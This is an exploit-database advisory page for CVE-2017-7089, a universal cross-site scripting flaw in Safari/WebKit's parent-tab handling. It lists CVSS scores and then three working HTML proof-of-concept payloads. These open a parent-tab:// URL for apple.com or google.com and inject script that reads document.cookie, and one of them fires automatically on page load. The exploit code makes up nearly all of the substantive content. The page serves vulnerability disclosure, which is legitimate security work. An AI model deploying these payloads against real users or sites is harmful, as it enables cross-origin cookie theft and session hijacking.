Webkit (Safari) Universal Cross-site Scripting

2018.11.16
Credit: Anton Lopanitsyn
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2017-7089
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

<!-- # CVE-2017-7089 **Impact**: Processing maliciously crafted web content may lead to universal cross site scripting **Description**: A logic issue existed in the handling of the parent-tab. This issue was addressed with improved state management. #### Safari 10 ##### Local SOP bypass ```html <script> function Pew(){var doc=open('parent-tab://apple.com');doc.document.body.innerHTML='<img src=q onerror=alert(document.cookie)>';}</script><button onclick=Pew();>Click me!</button> ``` ##### Exploit by Frans Rosén ```html data:text/html,<script>function y(){x=open('parent-tab://google.com','_top'),x.document.body.innerHTML='<img/src=""onerror="alert(document.cookie)">'};setTimeout(y,100)</script> ``` --> <body onload=document.getElementById('pew').click()> <a id='pew' href='data:text/html,<script>function y(){x=open(&#x27;parent-tab://apple.com&#x27;,&#x27;_top&#x27;),x.document.body.innerHTML=&#x27;<img/src=""onerror=alert(document.domain);alert(document.cookie);>&#x27;};setTimeout(y,100)</script>'>hello</a> </body>


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top